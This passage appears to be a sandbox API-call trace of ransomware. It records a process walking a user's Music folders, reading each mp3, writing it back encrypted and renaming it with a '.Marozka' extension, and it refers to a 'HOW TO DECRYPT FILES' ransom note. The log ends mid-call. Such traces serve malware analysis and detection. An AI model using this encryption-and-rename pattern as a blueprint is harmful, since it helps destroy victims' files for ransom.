GetFileType (hFile=0x2e0) returned 0x1 [0057.532] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea9c | out: lpFileSizeHigh=0x5bea9c*=0x0) returned 0x135f [0057.533] ReadFile (in: hFile=0x2e0, lpBuffer=0x2710958, nNumberOfBytesToRead=0x135f, lpNumberOfBytesRead=0x5bea48, lpOverlapped=0x0 | out: lpBuffer=0x2710958*, lpNumberOfBytesRead=0x5bea48*=0x135f, lpOverlapped=0x0) returned 1 [0057.533] CloseHandle (hObject=0x2e0) returned 1 [0057.602] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be560, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0057.602] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0057.602] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea90 | out: lpFileInformation=0x5bea90*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.602] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0057.603] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\WMwSi3JM.mp3", nBufferLength=0x105, lpBuffer=0x5be448, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\WMwSi3JM.mp3", lpFilePart=0x0) returned 0x2a [0057.603] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be98c) returned 1 [0057.603] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\WMwSi3JM.mp3" (normalized: "c:\\users\\fd1hvy\\music\\eweirmb\\wmwsi3jm.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0057.603] GetFileType (hFile=0x2e0) returned 0x1 [0057.603] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be988) returned 1 [0057.603] GetFileType (hFile=0x2e0) returned 0x1 [0057.604] WriteFile (in: hFile=0x2e0, lpBuffer=0x2763824*, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0x5bea3c, lpOverlapped=0x0 | out: lpBuffer=0x2763824*, lpNumberOfBytesWritten=0x5bea3c*=0x1360, lpOverlapped=0x0) returned 1 [0057.604] CloseHandle (hObject=0x2e0) returned 1 [0057.605] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\WMwSi3JM.mp3", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\WMwSi3JM.mp3", lpFilePart=0x0) returned 0x2a [0057.605] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\WMwSi3JM.mp3.Marozka", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\WMwSi3JM.mp3.Marozka", lpFilePart=0x0) returned 0x32 [0057.605] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea20) returned 1 [0057.605] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\WMwSi3JM.mp3" (normalized: "c:\\users\\fd1hvy\\music\\eweirmb\\wmwsi3jm.mp3"), fInfoLevelId=0x0, lpFileInformation=0x5bea9c | out: lpFileInformation=0x5bea9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79b11150, ftCreationTime.dwHighDateTime=0x1d4ca32, ftLastAccessTime.dwLowDateTime=0x9ef38c20, ftLastAccessTime.dwHighDateTime=0x1d4cb15, ftLastWriteTime.dwLowDateTime=0xe51066e0, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x1360)) returned 1 [0057.605] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea1c) returned 1 [0057.605] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\WMwSi3JM.mp3" (normalized: "c:\\users\\fd1hvy\\music\\eweirmb\\wmwsi3jm.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\WMwSi3JM.mp3.Marozka" (normalized: "c:\\users\\fd1hvy\\music\\eweirmb\\wmwsi3jm.mp3.marozka")) returned 1 [0057.606] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea80) returned 1 [0057.606] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\G7ZWbIe", nBufferLength=0x105, lpBuffer=0x5be534, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\G7ZWbIe", lpFilePart=0x0) returned 0x25 [0057.606] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\G7ZWbIe\\*", lpFindFileData=0x5be7a8 | out: lpFindFileData=0x5be7a8) returned 0xa7d988 [0057.606] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0057.606] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0057.606] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0057.606] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0057.607] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0057.607] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 0 [0057.607] FindClose (in: hFindFile=0xa7d988 | out: hFindFile=0xa7d988) returned 1 [0057.607] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea3c) returned 1 [0057.607] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea48) returned 1 [0057.607] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea80) returned 1 [0057.607] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\G7ZWbIe", nBufferLength=0x105, lpBuffer=0x5be534, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\G7ZWbIe", lpFilePart=0x0) returned 0x25 [0057.607] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\G7ZWbIe\\*", lpFindFileData=0x5be7a8 | out: lpFindFileData=0x5be7a8) returned 0xa7dc08 [0057.607] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0057.607] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0057.608] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0057.608] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0057.608] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0057.608] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 0 [0057.608] FindClose (in: hFindFile=0xa7dc08 | out: hFindFile=0xa7dc08) returned 1 [0057.608] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea3c) returned 1 [0057.608] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea48) returned 1 [0057.608] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\G7ZWbIe\\S23w-sSvttgl2.mp3", nBufferLength=0x105, lpBuffer=0x5be3e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\G7ZWbIe\\S23w-sSvttgl2.mp3", lpFilePart=0x0) returned 0x37 [0057.609] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be92c) returned 1 [0057.609] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\G7ZWbIe\\S23w-sSvttgl2.mp3" (normalized: "c:\\users\\fd1hvy\\music\\eweirmb\\g7zwbie\\s23w-ssvttgl2.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0057.609] GetFileType (hFile=0x2e0) returned 0x1 [0057.609] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be928) returned 1 [0057.609] GetFileType (hFile=0x2e0) returned 0x1 [0057.609] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea28 | out: lpFileSizeHigh=0x5bea28*=0x0) returned 0x10d21 [0057.609] ReadFile (in: hFile=0x2e0, lpBuffer=0x27669c4, nNumberOfBytesToRead=0x10d21, lpNumberOfBytesRead=0x5be9d4, lpOverlapped=0x0 | out: lpBuffer=0x27669c4*, lpNumberOfBytesRead=0x5be9d4*=0x10d21, lpOverlapped=0x0) returned 1 [0057.609] CloseHandle (hObject=0x2e0) returned 1 [0057.626] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be4ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0057.626] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0057.626] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea1c | out: lpFileInformation=0x5bea1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.626] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0057.626] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\G7ZWbIe\\S23w-sSvttgl2.mp3", nBufferLength=0x105, lpBuffer=0x5be3d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\G7ZWbIe\\S23w-sSvttgl2.mp3", lpFilePart=0x0) returned 0x37 [0057.626] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be918) returned 1 [0057.626] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\G7ZWbIe\\S23w-sSvttgl2.mp3" (normalized: "c:\\users\\fd1hvy\\music\\eweirmb\\g7zwbie\\s23w-ssvttgl2.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0057.628] GetFileType (hFile=0x2e0) returned 0x1 [0057.628] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be914) returned 1 [0057.628] GetFileType (hFile=0x2e0) returned 0x1 [0057.628] WriteFile (in: hFile=0x2e0, lpBuffer=0x27e5f54*, nNumberOfBytesToWrite=0x10d30, lpNumberOfBytesWritten=0x5be9c8, lpOverlapped=0x0 | out: lpBuffer=0x27e5f54*, lpNumberOfBytesWritten=0x5be9c8*=0x10d30, lpOverlapped=0x0) returned 1 [0057.629] CloseHandle (hObject=0x2e0) returned 1 [0057.631] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\G7ZWbIe\\S23w-sSvttgl2.mp3", nBufferLength=0x105, lpBuffer=0x5be4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\G7ZWbIe\\S23w-sSvttgl2.mp3", lpFilePart=0x0) returned 0x37 [0057.631] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\G7ZWbIe\\S23w-sSvttgl2.mp3.Marozka", nBufferLength=0x105, lpBuffer=0x5be4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\G7ZWbIe\\S23w-sSvttgl2.mp3.Marozka", lpFilePart=0x0) returned 0x3f [0057.631] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9ac) returned 1 [0057.631] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\G7ZWbIe\\S23w-sSvttgl2.mp3" (normalized: "c:\\users\\fd1hvy\\music\\eweirmb\\g7zwbie\\s23w-ssvttgl2.mp3"), fInfoLevelId=0x0, lpFileInformation=0x5bea28 | out: lpFileInformation=0x5bea28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1b5ab50, ftCreationTime.dwHighDateTime=0x1d4cc9a, ftLastAccessTime.dwLowDateTime=0xeae668f0, ftLastAccessTime.dwHighDateTime=0x1d4cb83, ftLastWriteTime.dwLowDateTime=0xe5152c7f, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x10d30)) returned 1 [0057.631] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9a8) returned 1 [0057.631] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\G7ZWbIe\\S23w-sSvttgl2.mp3" (normalized: "c:\\users\\fd1hvy\\music\\eweirmb\\g7zwbie\\s23w-ssvttgl2.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\G7ZWbIe\\S23w-sSvttgl2.mp3.Marozka" (normalized: "c:\\users\\fd1hvy\\music\\eweirmb\\g7zwbie\\s23w-ssvttgl2.mp3.marozka")) returned 1 [0057.632] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea0c) returned 1 [0057.632] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\G7ZWbIe\\tGw37FN1uD9jWEI-n0", nBufferLength=0x105, lpBuffer=0x5be4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\G7ZWbIe\\tGw37FN1uD9jWEI-n0", lpFilePart=0x0) returned 0x38 [0057.632] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\G7ZWbIe\\tGw37FN1uD9jWEI-n0\\*", lpFindFileData=0x5be734 | out: lpFindFileData=0x5be734) returned 0xa7db88 [0057.632] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0057.632] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0057.632] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0057.632] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0057.632] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0057.633] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 0 [0057.633] FindClose (in: hFindFile=0xa7db88 | out: hFindFile=0xa7db88) returned 1 [0057.633] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9c8) returned 1 [0057.633] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9d4) returned 1 [0057.633] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea0c) returned 1 [0057.633] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\G7ZWbIe\\tGw37FN1uD9jWEI-n0", nBufferLength=0x105, lpBuffer=0x5be4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\G7ZWbIe\\tGw37FN1uD9jWEI-n0", lpFilePart=0x0) returned 0x38 [0057.633] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\G7ZWbIe\\tGw37FN1uD9jWEI-n0\\*", lpFindFileData=0x5be734 | out: lpFindFileData=0x5be734) returned 0xa7dc08 [0057.633] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0057.633] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0057.633] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0057.633] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0057.634] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0057.634] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 0 [0057.634] FindClose (in: hFindFile=0xa7dc08 | out: hFindFile=0xa7dc08) returned 1 [0057.634] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9c8) returned 1 [0057.634] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9d4) returned 1 [0057.634] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea80) returned 1 [0057.634] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7", nBufferLength=0x105, lpBuffer=0x5be534, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7", lpFilePart=0x0) returned 0x2c [0057.634] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\*", lpFindFileData=0x5be7a8 | out: lpFindFileData=0x5be7a8) returned 0xa7d688 [0057.634] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0057.634] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0057.635] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0057.635] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0057.635] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0057.635] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0057.635] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0057.635] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 0 [0057.635] FindClose (in: hFindFile=0xa7d688 | out: hFindFile=0xa7d688) returned 1 [0057.635] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea3c) returned 1 [0057.635] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea48) returned 1 [0057.635] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea80) returned 1 [0057.635] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7", nBufferLength=0x105, lpBuffer=0x5be534, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7", lpFilePart=0x0) returned 0x2c [0057.635] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\*", lpFindFileData=0x5be7a8 | out: lpFindFileData=0x5be7a8) returned 0xa7d688 [0057.636] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0057.636] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0057.636] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0057.636] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0057.636] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0057.636] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0057.636] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0057.637] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 0 [0057.637] FindClose (in: hFindFile=0xa7d688 | out: hFindFile=0xa7d688) returned 1 [0057.637] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea3c) returned 1 [0057.637] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea48) returned 1 [0057.637] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea0c) returned 1 [0057.637] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy", nBufferLength=0x105, lpBuffer=0x5be4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy", lpFilePart=0x0) returned 0x37 [0057.637] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\*", lpFindFileData=0x5be734 | out: lpFindFileData=0x5be734) returned 0xa7d688 [0057.637] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0057.637] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0057.637] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0057.637] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0057.637] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0057.638] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 0 [0057.638] FindClose (in: hFindFile=0xa7d688 | out: hFindFile=0xa7d688) returned 1 [0057.638] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9c8) returned 1 [0057.638] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9d4) returned 1 [0057.638] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea0c) returned 1 [0057.638] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy", nBufferLength=0x105, lpBuffer=0x5be4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy", lpFilePart=0x0) returned 0x37 [0057.638] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\*", lpFindFileData=0x5be734 | out: lpFindFileData=0x5be734) returned 0xa7d688 [0057.638] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0057.638] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0057.638] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0057.639] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0057.639] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0057.639] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 0 [0057.639] FindClose (in: hFindFile=0xa7d688 | out: hFindFile=0xa7d688) returned 1 [0057.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9c8) returned 1 [0057.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9d4) returned 1 [0057.639] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\cfOn4.mp3", nBufferLength=0x105, lpBuffer=0x5be374, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\cfOn4.mp3", lpFilePart=0x0) returned 0x41 [0057.639] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be8b8) returned 1 [0057.639] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\7ow2oHSjqy\\cfOn4.mp3" (normalized: "c:\\users\\fd1hvy\\music\\eweirmb\\nsmyppyczft6c7\\7ow2ohsjqy\\cfon4.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0057.639] GetFileType (hFile=0x2e0) returned 0x1 [0057.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be8b4) returned 1 [0057.639] GetFileType (hFile=0x2e0) returned 0x1 [0057.639] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5be9b4 | out: lpFileSizeHigh=0x5be9b4*=0x0) returned 0x1096d [0057.639] ReadFile (in: hFile=0x2e0, lpBuffer=0x27fcf08, nNumberOfBytesToRead=0x1096d, lpNumberOfBytesRead=0x5be960, lpOverlapped=0x0 | out: lpBuffer=0x27fcf08*, lpNumberOfBytesRead=0x5be960*=0x1096d, lpOverlapped=0x0) returned 1 [0057.640] CloseHandle (hObject=0x2e0) returned 1 [0057.714] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0057.714] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be92c) returned 1 [0057.714] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5be9a8 | out: lpFileInformation=0x5be9a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0057.715] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be928) returned 1 [0057.715] GetFullPathNameW (in: 